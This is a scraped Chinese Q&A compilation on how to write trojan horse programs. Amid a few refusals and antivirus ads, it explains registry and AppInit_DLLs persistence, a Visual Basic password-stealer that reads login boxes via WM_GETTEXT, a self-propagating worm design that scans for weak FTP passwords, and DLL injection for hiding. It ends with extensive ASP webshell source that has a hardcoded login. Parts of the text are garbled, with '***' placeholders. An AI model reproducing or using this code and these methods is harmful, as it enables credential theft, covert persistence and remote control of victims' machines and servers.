木马程序的构成_木马程序部分代码解析

如何编写木马程序?

怎样编写木马程序

您好

建议您不要去学习使用木马病毒，是属于违法犯罪行为。而且，如果您接收了木马病毒，那么该病毒会自动在您的电脑中优先运行。

建议您到腾讯电脑管家官网下载一个电脑管家。

在平时使用电脑的时候，打开电脑管家，可以受到电脑管家16层实时防护的保护和云智能预警系统，可以在木马活动早期侦测并阻断木马的破坏行为，通过云查杀技术秒杀最新流行木马。

如果还有其他疑问和问题，欢迎再次来电脑管家企业平台进行提问，我们将尽全力为您解答疑难

腾讯电脑管家企业平台：zhidao.baidu/c/guanjia/

如何编写木马程序？？

你想干什么？如果你只想玩玩，建议你学一下vbs脚本或bat脚本，如果你想把脚本做成exe程序，最简单的 *** 就是把脚本压缩到自解压文件里，再用16进制编辑器修改一下某个数值，就成功了。

如果你想干坏事，嘻嘻，木马也不是那么好写的，首先你要成为一个出色的程序员，不仅要打好C语言基础，更要精通汇编语言和计算机硬件以及操作系统原理，逻辑思维要强，当然要学的还很多，如mfc，C#等等，所以，如果你不是非常痴迷于编程，我劝你玩玩就行了，当然，更不要走上违法犯罪的道路吆！

good luck。

呀，还有，请采纳我吧，宝贝儿，嘻！

如何编写木马程序

如果对电脑感兴趣的话可以学习下，一般软件开发工程师都是学的高级语言，但是如果写木马，我们一般是要接触低级语言的，低级语言比高级语言学起来枯燥，但学成之后进阶高级语言很快而且比一般的程序员牛逼，高级语言配合底层知识才能写出更好的木马。底层知识越牢固越好。

怎样才能编程木马程序

北上广深这么多程序员，怎么没几个搞这种编程的？

一个原因就是没钱赚，另一个原因就是技术上要求太高。

好好的学编程，从你提这个问题来看，你都还没入门吧。

慢慢学，你会发现学得越多自己越无知，等你有五年以上开发经验的时候，再来看你现在的这个提问的时候，一定会笑话这个时候的自己的。

祝你在开发的路上快速成长！

木马是如何编写的（三）

很高兴为您解答：

木马编写是需要你懂的C++语言

首先是程序的大小问题，本程序经编译链接后得到的可执行文件竟有400多K，用Aspack1.07压了一下也还有200多K。可以看出不必要的Form是应该去掉的；并且尽量由自己调用底层的API函数，而尽量少使用Borland打好包的VCL控件；要尽量使用汇编语言（BCB支持C++和汇编混编），不但速度会加快，而且大小可以小很多，毕竟木马是越小越好。

还有启动方式的选择。出了Win.ini、System.ini之外，也还是那几个注册表键值，如：

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\

RunServices

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

都已被其他的木马用烂了。现在又开始对exe、dll和txt文件的关联程序动手脚了（如冰河和广外女生）。这里涉及到参数传递的问题。得到ParamStr（）函数传来的参数，启动自己后再启动与之关联的程序，并将参数传递给它，这样就完成了一次“双启动”，而受害者丝毫感觉不到有任何异常。具体键值如：

与exe文件建立关联：HKEY_CLASSES_ROOT\exefile\shell\open\mand

与txt文件建立关联：HKEY_CLASSES_ROOT\txtfile\shell\open\mand

与dll文件建立关联：HKEY_CLASSES_ROOT\dllfile\shell\open\mand

等，当然还可以自己扩充。目前还有一种新 *** ：在

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

\Windows

下添加如下键值 "AppInit_DLLs"="Server.dll"，这就把Server.dll注册为系统启动时必须加载的模块（你应该把木马编译成DLL）。下次开机时，木马以动态链接库形式被加载，存在于系统进程中。因为没有它自己的PID（Process ID 进程识别号），所以在NT的任务管理器中也看不见（不过在“系统信息”——“软件环境”——“已加载的32位模块”中还是可以详细看到当前内存中加载的每一个模块的），这样做的目的是可以使自己的程序更加隐蔽，提高木马的生存能力。

木马的功能还可以大大扩充。你可以充分发挥你的想象力——比如上传、下载、新建、改名、移动文件，截图存为jpg文件传回，录音监听成Wav文件，录像成AVI文件，弹光驱，读软驱，关机，重启，不停地挂起，胡乱切换分辨率（烧掉你的显示器），发对话框，不停地打开资源管理器直到死机，杀掉Kernel32.dll进程使机器暴死，交换鼠标左右键，固定鼠标，限制鼠标活动范围，鼠标不听指挥到处乱窜，记录击键记录（记录上网口令，这需要深入了解钩子（Hook）技术，如键盘钩子和鼠标钩子），窃取......

编写木马？

盗号木马~~~~楼主，这不是好玩的东西，不过看在高分悬赏的份上，就告诉你吧。 可以通过 SendMessage 发送 WM_GETTEXT 取得密码框中的值，我们可以利用这一点来完成密码的截取。 使用 Timer 控件，监视 *** 。 用遍查窗口的 *** (EnumWindows)，取得所有的窗口标题(GetWindowText)，判断其中是否为" *** 用户登录"的标题，取 得 *** 登录窗口的子窗口(窗口上的控件)的类名(GetClassName)，然后通过 boBox、Edit 取得用户名和密码(通过 SendMessage 发送 WM_GETTEXT 取得值)。 由于不能判断外部按键事件的发生，只有通过不断的取得密码值，具体 *** 如下： 首先取得 用户名的值，然后不停的取密码的值，再判断窗口的标题是否为用户名，如果为用户名，则最后一次密码的值就是真正的密码，到此程序完成。 程序编制 (1)首先为了避免程序被多次装载，造成系统资源的浪费、及不必要的错误。 声明变量、过程及 API 函数,写在 Module1.bas 文件中 Declare Function CreateFileMapping Lib "kernel32" Alias "CreateFileMappingA" (ByVal hFile As Long, lpFileMappigAttributes As SECURITY_ATTRIBUTES, ByVal flProtect As Long, ByVal dwMaximumSizeHigh As Long, ByVal dwMaximumSizeLow As Long, ByVal lpName As String) As Long '创建一个新的文件映射对象

Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long '关闭一个内核对象

Type SECURITY_ATTRIBUTES

nLength As Long

lpSecurityDescriptor As Long

bInheritHandle As Long

End Type

Const PAGE_READWRITE = 1

Const ERROR_ALREADY_EXISTS = 183

建立判断程序是否多启动的过程

Sub Main()

Dim ynRun As Long

Dim sa As SECURITY_ATTRIBUTES

sa.bInheritHandle = 1

sa.lpSecurityDescriptor = 0

sa.nLength = Len(sa)

ynRun = CreateFileMapping(HFFFFFFFF, sa, PAGE_READWRITE, 0, 128, App.title) '创建内存映射文件

If (Err.LastDllError = ERROR_ALREADY_EXISTS) Then '如果指定内存文件已存在，则退出

CloseHandle ynRun '退出程序前关闭内存映射文件

End

End If

End Sub

(2)即时监视，就需要在系统启动时，程序自启动，这里使用修改注册表的 *** 声明变量、过程及 API......

木马程序是怎么编出来的

一个典型的蠕虫病毒有两个功能型部件：传播和破坏，流行的蠕虫病毒大都是利用操作系统或者应用程序的漏洞（以弱口令和溢出最为常见），但常常并不会对宿主机造成“致命”的破坏。这两个特点使蠕虫病毒比普通电脑病毒传播得更快，影响力更大。一般来说，单一的蠕虫病毒只针对某种特定的漏洞进行攻击，所以一旦这种漏洞得到大范围修补，病毒也就没有了生存空间。

更新这种设计，我把传播部件拆分开来：把扫描、攻击和破坏脚本化，主程序则负责解析这些脚本。例如针对ftp弱口令进行扫描，我们可以定义如下脚本：

code:

uid = iscript-0a21-2331-x #随机唯一编号

using tcp;

port 21;

send “user anonymous”;

send crlf;

send “pass [email protected]”

send crlf;

if (find “200”) resulrt ok;

next;

[copy to clipboard]

解析了这段脚本后（我想这种脚本是很容易读懂的），我们再定义一系列的过程，把我们的蠕虫体upload上去，一次完整的传播动作就完成了。如果是溢出漏洞，为了简单起见我们可以采集远程溢出的数据包，然后修改ip地址等必要数据，再转发溢出数据包进行溢出（这种情况下要实现connect-back就不容易了，不过这些具体问题就待有心人去研究吧），例如：

code:

using raw;

ip offset at 12;

send “\x1a\xb2\xcc” ……

[copy to clipboard]d

主程序在完成传播后留下一个后门，其他宿主机可以通过这个后门与本地的蠕虫病毒同步传播脚本，这样每次有新的漏洞产生，宿主机的传播方式可以很快地得到升级。我们当然不会仅满足于这样一个蠕虫程序，扫描/攻击脚本的传播过程也是需要仔细处理的。

我们希望适应力（fitness）最强的脚本得到广泛的应用（看起来有点类似 蚁群算法 和 ga），所以我们要求得每个个体的fitness，当它和另一个体取得联系的时候就可以决定谁的传播脚本将取代另一个：

fitness = number of host infected / number of host scanned

但也不能仅凭fitness就修改传播脚本，我个人觉得一个合适的概率是75%，20%的机会保持各自的传播脚本，剩下的5%则交换脚本。这样在维持每种脚本都有一定生存空间的情况下使适应性更好的个体得到更多的传播机会，同时，一些在某种 *** 环境下适应性不强的脚本也有机会尝试不同的 *** 环境。

木马程序是怎么写出来的？

您好：

建议您不要编写木马程序，木马程序会对您和别人的电脑造成损害的，如果您曾编写过此类不安全的软件的话，为了您电脑的安全，建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧，打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以，您可以点击这里下载最新版的腾讯电脑管家：最新版腾讯电脑管家下载

腾讯电脑管家企业平台：zhidao.baidu/c/guanjia/

怎么 *** 木马程序？

你需要学会编程才能编写木马编写木马更好用vc++。enet/eschool/video/c++/ 这是c++的教程，你学懂了这些皮毛的东西再深入研究内核编程吧如果上面的地址打不开可以到这里pconline/pcedu/empolder/gj/vc/0607/820674

怎么编写一个简单的木马程序?

特洛依木马这个名词大家应该不陌生，自从98年“死牛崇拜”黑客小组公布Back Orifice以来，木马犹如平地上的惊雷， 使在Dos——Windows时代中长大的中国网民从五彩缤纷的 *** 之梦中惊醒，终于认识到的 *** 也有它邪恶的一面，一时间人心惶惶。

我那时在《电脑报》上看到一篇文章，大意是一个菜鸟被人用BO控制了，吓得整天吃不下饭、睡不着觉、上不了网，到处求救！要知道，木马（Trojan）的历史是很悠久的：早在ATT Unix和BSD Unix十分盛行的年代，木马是由一些玩程式（主要是C）水平很高的年轻人（主要是老美）用C或Shell语言编写的，基本是用来窃取登陆主机的口令，以取得更高的权限。那时木马的主要 *** 是诱骗——先修改你的.profile文件，植入木马；当你登陆时将你敲入的口令字符存入一个文件，用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的薰陶下长大的，对 *** 可以说很陌生。直到Win9x横空出世，尤其是WinNt的普及，大大推动了 *** 事业的发展的时候，BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马（甚至在Win9x的“关闭程序”对话框可以看到进程）给了当时中国人极大的震撼，它在中国的 *** 安全方面可以说是一个划时代的软件。

自己编写木马，听起来很Cool是不是？！木马一定是由两部分组成——服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的 *** 协议来进行通讯（一般是TCP/IP协议）。为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗？

启动C++Builder 5.0企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NM *** TP。Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和 *** TP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

我们首先应该让我们的程序能够隐身。双击Form，首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的......

什么叫木马程序？

木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码，是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。木马病毒其实是计算机黑客用于远程控制计算机的程序，将控制程序寄生于被控制的计算机系统中，里应外合，对被感染木马病毒的计算机实施操作。一般的木马病毒程序主要是寻找计算机后门，伺机窃取被控计算机中的密码和重要文件等。可以对被控计算机实施监控、资料修改等非法操作。木马病毒具有很强的隐蔽性，可以根据黑客意图突然发起攻击。

什么是木马程序，他是怎样盗取密码的，能详细说说吗？应该怎样判断是否是木马程序呢？

什么是木马?

特洛伊木马(以下简称木马)，英文叫做“Trojan house”，其名称取自希腊神话的特洛伊木马记。

它是一种基于远程控制的黑客工具，具有隐蔽性和非授权性的特点。

所谓隐蔽性是指木马的设计者为了防止木马被发现，会采用多种手段隐藏木马，这样服务端即使发现感染了木马，由于不能确定其具 *** 置，往往只能望“马”兴叹。

所谓非授权性是指一旦控制端与服务端连接后，控制端将享有服务端的大部分操作权限，包括修改文件，修改注册表，控制鼠标，键盘等等，而这些权力并不是服务端赋予的，而是通过木马程序窃取的。

从木马的发展来看，基本上可以分为两个阶段。

最初 *** 还处于以UNIX平台为主的时期，木马就产生了，当时的木马程序的功能相对简单，往往是将一段程序嵌入到系统文件中，用跳转指令来执行一些木马的功能，在这个时期木马的设计者和使用者大都是些技术人员，必须具备相当的 *** 和编程知识。

而后随着WINDOWS平台的日益普及，一些基于图形操作的木马程序出现了，用户界面的改善，使使用者不用懂太多的专业知识就可以熟练的操作木马，相对的木马入侵事件也频繁出现，而且由于这个时期木马的功能已日趋完善，因此对服务端的破坏也更大了。

所以所木马发展到今天，已经无所不用其极，一旦被木马控制，你的电脑将毫无秘密可言。

参考资料：

回答者：完颜康康 - 探花 十一级 9-18 12:40

--------------------------------------------------------------------------------

DLL 木马揭秘

相信经常玩木马的朋友们都会知道一些木马的特性，也会有自己最喜爱的木马，不过，很多朋友依然不知道近年兴起的“DLL木马”为何物。什么是“DLL木马”呢？它与一般的木马有什么不同？

一、从DLL技术说起

要了解DLL木马，就必须知道这个“DLL”是什么意思，所以，让我们追溯到几年前，DOS系统大行其道的日子里。在那时候，写程序是一件繁琐的事情，因为每个程序的代码都是独立的，有时候为了实现一个功能，就要为此写很多代码，后来随着编程技术发展，程序员们把很多常用的代码 *** （通用代码）放进一个独立的文件里，并把这个文件称为“库”（Library），在写程序的时候，把这个库文件加入编译器，就能使用这个库包含的所有功能而不必自己再去写一大堆代码，这个技术被称为“静态链接”（Static Link）。静态链接技术让劳累的程序员松了口气，一切似乎都很美好。可是事实证明，美好的事物不会存在太久，因为静态链接就像一个粗鲁的推销员，不管你想不想要宣传单，他都全部塞到你的手上来。写一个程序只想用到一个库文件包含的某个图形效果，就因为这个，你不得不把这个库文件携带的所有的图形效果都加入程序，留着它们当花瓶摆设，这倒没什么重要，可是这些花瓶却把道路都阻塞了——静态链接技术让最终的程序成了大块头，因为编译器把整个库文件也算进去了。

时代在发展，静态链接技术由于天生的弊端，不能满足程序员的愿望，人们开始寻找一种更好的 *** 来解决代码重复的难题。后来，Windows系统出现了，时代的分水岭终于出现。Windows系统使用一种新的链接技术，这种被称为“动态链接”（Dynamic Link）的新技术同样也是使用库文件，微软称它们为“动态链接库”——Dynamic Link Library，DLL的名字就是这样来的。动态链接本身和静态链接没什么区别，也是把通用代码写进一些独立文件里，但是在编译方面，微软绕了个圈子，并没有采取把库文件加进程序的 *** ，而是把库文件做成已经编译好的程序文件，给它们开个交换数据的接口，程序员写程序的时候，一旦要使用某个库文件的一个功能函数，系统就把这个库文件调入内存，连接上这个程序占有的任务进程，然后执行程序要用的功能函数，并把结果返回给程序显示出来，在我们看来，就像是程序自己带有的功能一样。完成需要的功能后，这个DLL停止运行，整个调用过程结束。微软让这些库文件能被多个程序调用，实现了比较完美的共享，程序员无论要写什么程序，只要在代码里加入对相关DLL的调用声明就能使用它的全部功能。最重要的是，DLL绝对不会让你多拿一个花瓶，你要什么它就给你什么，你不要的东西它才不会给你。这样，写出来的程序就不能再携带一大堆垃圾了——绝对不会让你把吃剩的东西带回家，否则罚款，这是自助餐。

DLL技术的诞生，使编写程序变成一件简单的事情，Windows为我们提供了几千个函数接口，足以满足大多数程序员的需要。而且，Windows系统自身就是由几千个DLL文件组成，这些DLL相互扶持，组成了强大的Windows系统。如果Windows使用静态链接技术，它的体积会有多大？我不敢想。

二、应用程序接口API

上面我们对DLL技术做了个大概分析，在里面我提到了“接口”，这又是什么呢？因为DLL不能像静态库文件那样塞进程序里，所以，如何让程序知道实现功能的代码和文件成了问题，微软就为DLL技术做了标准规范，让一个DLL文件像奶酪一样开了许多小洞，每个洞口都注明里面存放的功能的名字，程序只要根据标准规范找到相关洞口就可以取得它要的美味了，这个洞口就是“应用程序接口”（Application Programming Interface），每个DLL带的接口都不相同，尽更大可能的减少了代码的重复。用Steven的一句话：API就是一个工具箱，你根据需要取出螺丝刀、扳手，用完后再把它们放回原处。在Windows里，最基本的3个DLL文件是kernel32.dll、user32.dll、gdi32.dll。它们共同构成了基本的系统框架。

三、DLL与木马

DLL是编译好的代码，与一般程序没什么大差别，只是它不能独立运行，需要程序调用。那么，DLL与木马能扯上什么关系呢？如果你学过编程并且写过DLL，就会发现，其实DLL的代码和其他程序几乎没什么两样，仅仅是接口和启动模式不同，只要改动一下代码入口，DLL就变成一个独立的程序了。当然，DLL文件是没有程序逻辑的，这里并不是说DLL=EXE，不过，依然可以把DLL看做缺少了main入口的EXE，DLL带的各个功能函数可以看作一个程序的几个函数模块。DLL木马就是把一个实现了木马功能的代码，加上一些特殊代码写成DLL文件，导出相关的API，在别人看来，这只是一个普通的DLL，但是这个DLL却携带了完整的木马功能，这就是DLL木马的概念。也许有人会问，既然同样的代码就可以实现木马功能，那么直接做程序就可以，为什么还要多此一举写成DLL呢？这是为了隐藏，因为DLL运行时是直接挂在调用它的程序的进程里的，并不会另外产生进程，所以相对于传统EXE木马来说，它很难被查到。

四、DLL的运行

虽然DLL不能自己运行，可是Windows在加载DLL的时候，需要一个入口函数，就如同EXE的main一样，否则系统无法引用DLL。所以根据编写规范，Windows必须查找并执行DLL里的一个函数DllMain作为加载DLL的依据，这个函数不作为API导出，而是内部函数。DllMain函数使DLL得以保留在内存里，有的DLL里面没有DllMain函数，可是依然能使用，这是因为Windows在找不到DllMain的时候，会从其它运行库中找一个不做任何操作的缺省DllMain函数启动这个DLL使它能被载入，并不是说DLL可以放弃DllMain函数。

五、DLL木马技术分析

到了这里，您也许会想，既然DLL木马有那么多好处，以后写木马都采用DLL方式不就好了吗？话虽然是这么说没错，但是DLL木马并不是一些人想象的那么容易写的。要写一个能用的DLL木马，你需要了解更多知识。

1.木马的主体

千万别把木马模块写得真的像个API库一样，这不是开发WINAPI。DLL木马可以导出几个辅助函数，但是必须有一个过程负责主要执行代码，否则这个DLL只能是一堆零碎API函数，别提工作了。

如果涉及一些通用代码，可以在DLL里写一些内部函数，供自己的代码使用，而不是把所有代码都开放成接口，这样它自己本身都难调用了，更不可能发挥作用。

DLL木马的标准执行入口为DllMain，所以必须在DllMain里写好DLL木马运行的代码，或者指向DLL木马的执行模块。

2.动态嵌入技术

Windows中，每个进程都有自己的私有内存空间，别的进程是不允许对这个私人领地进行操作的，但是，实际上我们仍然可以利用种种 *** 进入并操作进程的私有内存，这就是动态嵌入，它是将自己的代码嵌入正在运行的进程中的技术。动态嵌入有很多种，最常见的是钩子、API以及远程线程技术，现在的大多数DLL木马都采用远程线程技术把自己挂在一个正常系统进程中。其实动态嵌入并不少见，罗技的MouseWare驱动就挂着每一个系统进程-_-

远程线程技术就是通过在另一个进程中创建远程线程（RemoteThread）的 *** 进入那个进程的内存地址空间。在DLL木马的范畴里，这个技术也叫做“注入”，当载体在那个被注入的进程里创建了远程线程并命令它加载DLL时，木马就挂上去执行了，没有新进程产生，要想让木马停止惟有让挂接这个木马DLL的进程退出运行。但是，很多时候我们只能束手无策——它和Explorer.exe挂在一起了，你确定要关闭Windows吗？

3.木马的启动

有人也许会迫不及待的说，直接把这个DLL加入系统启动项目不就可以了。答案是NO，前面说过，DLL不能独立运行，所以无法在启动项目里直接启动它。要想让木马跑起来，就需要一个EXE使用动态嵌入技术让DLL搭上其他正常进程的车，让被嵌入的进程调用这个DLL的DllMain函数，激发木马运行，最后启动木马的EXE结束运行，木马启动完毕。

启动DLL木马的EXE是个重要角色，它被称为Loader，如果没有Loader，DLL木马就是破烂一堆，因此，一个算得上成熟的DLL木马会想办法保护它的Loader不会那么容易被毁灭。记得狼狈为奸的故事吗？DLL木马就是爬在狼Loader上的狈。

Loader可以是多种多样的，Windows的rundll32.exe也被一些DLL木马用来做了Loader，这种木马一般不带动态嵌入技术，它直接挂着rundll32进程运行，用rundll32的 *** （rundll32.exe [DLL名],[函数] [参数]）像调用API一样去引用这个DLL的启动函数激发木马模块开始执行，即使你杀了rundll32，木马本体还是在的，一个最常见的例子就是3721中文实名，虽然它不是木马。

注册表的AppInit_DLLs键也被一些木马用来启动自己，如求职信病毒。利用注册表启动，就是让系统执行DllMain来达到启动木马的目的。因为它是kernel调入的，对这个DLL的稳定性有很大要求，稍有错误就会导致系统崩溃，所以很少看到这种木马。

有一些更复杂点的DLL木马通过svchost.exe启动，这种DLL木马必须写成NT-Service，入口函数是ServiceMain，一般很少见，但是这种木马的隐蔽性也不错，而且Loader有保障。

4.其它

到这里大家也应该对DLL木马有个了解了，是不是很想写一个？别急，不知道大家想过没有，既然DLL木马这么好，为什么到现在能找到的DLL木马寥寥无几？现在让我来泼冷水，最重要的原因只有一个：由于DLL木马挂着系统进程运行，如果它本身写得不好，例如没有防止运行错误的代码或者没有严格规范用户的输入，DLL就会出错崩溃。别紧张，一般的EXE也是这样完蛋的，但是DLL崩溃会导致它挂着的程序跟着遭殃，别忘记它挂接的是系统进程哦，结局就是……惨不忍睹。所以写一个能公布的DLL木马，在排错检查方面做的工作要比一般的EXE木马多，写得多了自己都烦躁……

六、DLL木马的发现和查杀

经常看看启动项有没有多出莫名其妙的项目，这是Loader的所在，只要杀了狼，狈就不能再狂了。而DLL木马本体比较难发现，需要你有一定编程知识和分析能力，在Loader里查找DLL名称，或者从进程里看多挂接了什么陌生的DLL，可是对新手来说……总之就是比较难啊比较难，所以，最简单的 *** ：杀毒软件和防火墙（不是万能药，切忌长期服用）。

木马程序是什么，在2003、XP中是什么代码

什么是木马?

特洛伊木马(以下简称木马)，英文叫做“Trojan house”，其名称取自希腊神话的特洛伊木马记。

它是一种基于远程控制的黑客工具，具有隐蔽性和非授权性的特点。

所谓隐蔽性是指木马的设计者为了防止木马被发现，会采用多种手段隐藏木马，这样服务端即使发现感染了木马，由于不能确定其具 *** 置，往往只能望“马”兴叹。

所谓非授权性是指一旦控制端与服务端连接后，控制端将享有服务端的大部分操作权限，包括修改文件，修改注册表，控制鼠标，键盘等等，而这些权力并不是服务端赋予的，而是通过木马程序窃取的。

从木马的发展来看，基本上可以分为两个阶段。

最初 *** 还处于以UNIX平台为主的时期，木马就产生了，当时的木马程序的功能相对简单，往往是将一段程序嵌入到系统文件中，用跳转指令来执行一些木马的功能，在这个时期木马的设计者和使用者大都是些技术人员，必须具备相当的 *** 和编程知识。

而后随着WINDOWS平台的日益普及，一些基于图形操作的木马程序出现了，用户界面的改善，使使用者不用懂太多的专业知识就可以熟练的操作木马，相对的木马入侵事件也频繁出现，而且由于这个时期木马的功能已日趋完善，因此对服务端的破坏也更大了。

所以所木马发展到今天，已经无所不用其极，一旦被木马控制，你的电脑将毫无秘密可言。

鉴于木马的巨大危害性，我们将分原理篇，防御与反击篇，资料篇三部分来详细介绍木马，希望大家对特洛伊木马这种攻击手段有一个透彻的了解。

木马程序源码

一个asp木马：

＜%@ LANGUAGE = VBScript.Encode codepage ="936" %＞

＜%Server.ScriptTimeOut=5000%＞

＜object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"＞＜/object＞

＜object runat=server id=oScriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"＞＜/object＞

＜object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"＞＜/object＞

＜%

'on error resume next

dim Data_5xsoft

Class upload_5xsoft

dim objForm,objFile,Version

Public function Form(strForm)

strForm=lcase(strForm)

if not objForm.exists(strForm) then

Form=""

else

Form=objForm(strForm)

end if

end function

Public function File(strFile)

strFile=lcase(strFile)

if not objFile.exists(strFile) then

set File=new FileInfo

else

set File=objFile(strFile)

end if

end function

Private Sub Class_Initialize

dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile

dim iFileSize,sFilePath,sFileType,sFormValue,sFileName

dim iFindStart,iFindEnd

dim iFormStart,iFormEnd,sFormName

Version="HTTP上传程序 Version 2.0"

set objForm=Server.CreateObject("Scripting.Dictionary")

set objFile=Server.CreateObject("Scripting.Dictionary")

if Request.TotalBytes＜1 then Exit Sub

set tStream = Server.CreateObject("adodb.stream")

set Data_5xsoft = Server.CreateObject("adodb.stream")

Data_5xsoft.Type = 1

Data_5xsoft.Mode =3

Data_5xsoft.Open

Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)

Data_5xsoft.Position=0

RequestData =Data_5xsoft.Read

iFormStart = 1

iFormEnd = LenB(RequestData)

vbCrlf = chrB(13) chrB(10)

sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)

iStart = LenB (sStart)

iFormStart=iFormStart+iStart+1

while (iFormStart + 10) ＜ iFormEnd

iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf vbCrlf)+3

tStream.Type = 1

tStream.Mode =3

tStream.Open

Data_5xsoft.Position = iFormStart

Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart

tStream.Position = 0

tStream.Type = 2

tStream.Charset ="gb2312"

sInfo = tStream.ReadText

tStream.Close

iFormStart = InStrB(iInfoEnd,RequestData,sStart)

iFindStart = InStr(22,sInfo,"name=""",1)+6

iFindEnd = InStr(iFindStart,sInfo,"""",1)

sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))

if InStr (45,sInfo,"filename=""",1) ＞ 0 then

set theFile=new FileInfo

iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10

iFindEnd = InStr(iFindStart,sInfo,"""",1)

sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)

theFile.FileName=getFileName(sFileName)

theFile.FilePath=getFilePath(sFileName)

iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14

iFindEnd = InStr(iFindStart,sInfo,vbCr)

theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)

theFile.FileStart =iInfoEnd

theFile.FileSize = iFormStart -iInfoEnd -3

theFile.FormName=sFormName

if not objFile.Exists(sFormName) then

objFile.add sFormName,theFile

end if

else

tStream.Type =1

tStream.Mode =3

tStream.Open

Data_5xsoft.Position = iInfoEnd

Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3

tStream.Position = 0

tStream.Type = 2

tStream.Charset ="gb2312"

sFormValue = tStream.ReadText

tStream.Close

if objForm.Exists(sFormName) then

objForm(sFormName)=objForm(sFormName)", "sFormValue

else

objForm.Add sFormName,sFormValue

end if

end if

iFormStart=iFormStart+iStart+1

wend

RequestData=""

set tStream =nothing

End Sub

Private Sub Class_Terminate

if Request.TotalBytes＞0 then

objForm.RemoveAll

objFile.RemoveAll

set objForm=nothing

set objFile=nothing

Data_5xsoft.Close

set Data_5xsoft =nothing

end if

End Sub

Private function GetFilePath(FullPath)

If FullPath ＜＞ "" Then

GetFilePath = left(FullPath,InStrRev(FullPath, "\"))

Else

GetFilePath = ""

End If

End function

Private function GetFileName(FullPath)

If FullPath ＜＞ "" Then

GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)

Else

GetFileName = ""

End If

End function

End Class

Class FileInfo

dim FormName,FileName,FilePath,FileSize,FileType,FileStart

Private Sub Class_Initialize

FileName = ""

FilePath = ""

FileSize = 0

FileStart= 0

FormName = ""

FileType = ""

End Sub

Public function SaveAs(FullPath)

dim dr,ErrorChar,i

SaveAs=true

if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function

set dr=CreateObject("Adodb.Stream")

dr.Mode=3

dr.Type=1

dr.Open

Data_5xsoft.position=FileStart

Data_5xsoft.copyto dr,FileSize

dr.SaveToFile FullPath,2

dr.Close

set dr=nothing

SaveAs=false

end function

End Class

httpt = Request.ServerVariables("server_name")

rseb=Request.ServerVariables("SCRIPT_NAME")

q=request("q")

if q="" then q=rseb

select case q

case rseb

if Epass(trim(request.form("password")))="q_ux888556" then

response.cookies("password")="7758521"

response.redirect rseb "?q=list.asp"

else %＞

＜html＞

＜head＞

＜meta http-equiv="Content-Type" content="text/html; charset=gb2312"＞

＜title＞＜%=httpt%＞＜/title＞

＜meta name="GENERATOR" content="Microsoft FrontPage 3.0"＞

＜/head＞

＜body＞

＜%if request.form("password")＜＞"" then

response.write "Password Error!"

end if

%＞

＜table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"

bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0"＞

＜tr＞

＜td width="100%" height="31" bgcolor="#000080"＞＜p align="center"＞＜font color="#FFFFFF"＞＜%=httpt%＞＜/font＞＜/td＞

＜/tr＞

＜tr＞

＜td width="100%" height="46"＞＜form method="POST" action="＜%=rseb%＞?q=＜%=rseb%＞"＞

＜div align="center"＞＜center＞＜p＞Enter Password：＜input type="password" name="password"

size="20"

style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset"＞

＜input type="submit" value="OK!LOGIN" name="B1"

style="font-size: 9pt; border: thin outset"＞＜/p＞

＜/center＞＜/div＞

＜/form＞

＜/td＞

＜/tr＞

＜/table＞

＜/body＞

＜/html＞

